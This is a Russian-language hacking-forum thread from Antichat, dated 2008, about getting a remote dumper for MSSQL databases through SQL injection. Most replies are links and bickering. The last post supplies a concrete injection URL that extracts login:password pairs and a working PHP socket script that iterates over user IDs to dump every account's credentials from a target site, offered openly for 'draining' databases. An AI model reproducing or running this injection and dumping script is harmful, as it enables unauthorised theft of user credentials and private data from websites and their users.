Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
13.01.2008, 07:08
|
|
Участник форума
Регистрация: 22.11.2006
Сообщений: 117
Провел на форуме:
1813343
Репутация:
141
|
|
Mssql уддаленный дамп
Нужен удаленный дампер mssql.
Тот, что от Кэша с лимитом. Тот, что от СКЛХАК`а хз как с mssql работает. Поделитесь, у кого есть.
|
|
|
13.01.2008, 15:16
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813
Репутация:
1396
|
|
на
http://www.hack-shop.org.ru/
посмтри |
|
|
|
13.01.2008, 15:29
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357
Репутация:
3742
|
|
http://mssql-wa.leprado.com/website/
полнофункциональный интерфейс, дампера нет
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
13.01.2008, 15:33
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
епта mssql 2003 сервер...
|
|
|
|
13.01.2008, 20:35
|
|
Участник форума
Регистрация: 22.11.2006
Сообщений: 117
Провел на форуме:
1813343
Репутация:
141
|
|
$n@ke, это релиз от Кэша и есть.
Сообщение от blackbybr
полнофункциональный интерфейс, дампера нет
Красиво, но не то...
Сообщение от Кэш
епта mssql 2003 сервер...
епта, перезалей сорсы своего дампера =\
|
|
|
|
14.01.2008, 09:26
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
епта, перезалей сорсы своего дампера =\
Епта я его не куда заливал что бы перезаливать.
Нужен удаленный дампер mssql.
Тот, что от Кэша с лимитом. Тот, что от СКЛХАК`а хз как с mssql работает. Поделитесь, у кого есть.
Научись формулировать мысли.
Удаленные дампер через иньекцию.
|
|
|
|
14.01.2008, 09:49
|
|
Участник форума
Регистрация: 22.11.2006
Сообщений: 117
Провел на форуме:
1813343
Репутация:
141
|
|
Я думаю, кто хотел, тот понял.
|
|
|
|
14.01.2008, 10:57
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
Я не понял, блеки тоже мы тупые...
|
|
|
|
14.01.2008, 11:01
|
|
Участник форума
Регистрация: 22.11.2006
Сообщений: 117
Провел на форуме:
1813343
Репутация:
141
|
|
Сообщение от [ cash ]
Я не понял, блеки тоже мы тупые...
Тебе сочувствую, а Блеки понял, явно указав, что дампера нет. бгг)
Деньги - оффтопер =\
|
|
|
|
14.01.2008, 20:45
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
Как я понял постановку задачи: тебе нужно слить базу какого-то ресурса, используя инъекцию. Тоесть выводится по одному юзеру и нужно постоянно увеличивать значения некого колумна-идентификатора юзера, так ? Например
http://www.site.com/index.asp?id=1+or+1=(SELECT+TOP+1+cast(login+as+nv archar)%2B%27%3A%27%2Bcast(password+as+ nvarchar)+from+users+where+ uID=3)--
Если я правильно понял задачу (?), то могу поделится своим решением.
Что нам мешает сделать скрипт на базе сокетов и http протокола вот такого типа
PHP код:
<?php
$PORT = 80; // рабочий порт
$ADDR = gethostbyname("site.com"); // ресурс, базу которой мы сливаем
//каждую итерацию цикла мы извлекаем одного юзера
for($n = 0;$n < 1000;$n++)
{
$fp = socket_create(AF_INET,SOCK_STREAM,SOL_TCP); // создаем сокет
socket_connect($fp,$ADDR,$PORT); // конектимся к нужному ресурсу
//отправляем http- запрос, в котором содержится инъекция
$str1 = "GET http://www.site.com/index.asp?id=1+or+1=(SELECT+TOP+1+cast(login+as+nv archar)%2B%27%3A%27%2Bcast(password+as+ nvarchar)+from+users+where+uID=";
$str2 = ")-- HTTP/1.0\r\n Host: site.com\r\n\r\n";
$str = $str1.$n.$str2; // значение uID в инъекции соответствует значению параметра цикла $n
socket_write($fp,$str,strlen($str)); //отправляем слепленную строку
while($out = socket_read($fp,2048)) // читаем ответ сервера - это исходный код html-страницы
{
//Фильтрация полученной страницы - нам нужно извлечь необходимые данные. Для каждого сайта
//будет своя фильтрация
//Например если нужные нам данные выводятся в заголовок страницы:
// <html>
// <title> login;password;email </title>
// ...
// </html>
$s = strstr($out,"<title>");
$nm = strpos($s,"</title>");
$result = substr($s,7,$nm - 7);
//Конец фильтрации
echo $result; // выводим результат или пишем его в файл
}
echo "<br>"; //выводим каждого юзера с новой строки
socket_close($fp); //завершаем роботу с сокетом
}// конец for
?>
Думаю принцип понятен - в комментариях все написано. Правда я делал скрипт для сливания баз с сайтов с MySQL инъекцией (вот почему и нужно делать свою фильтрацию для каждого сайта), но его элементарные принципы позволяют работать и с MSSQL.
Примитивно - зато работает |
|
|
|
|
|
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
mssql
|
Doom123 |
PHP, PERL, MySQL, JavaScript |
6 |
13.01.2008 22:04 |
|
Взлом MSSQl баз
|
freelancer |
Разное - Покупка, продажа, обмен |
0 |
09.01.2008 21:23 |
|
Дамп базы через Shell
|
Azazel |
PHP, PERL, MySQL, JavaScript |
2 |
13.08.2005 13:30 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
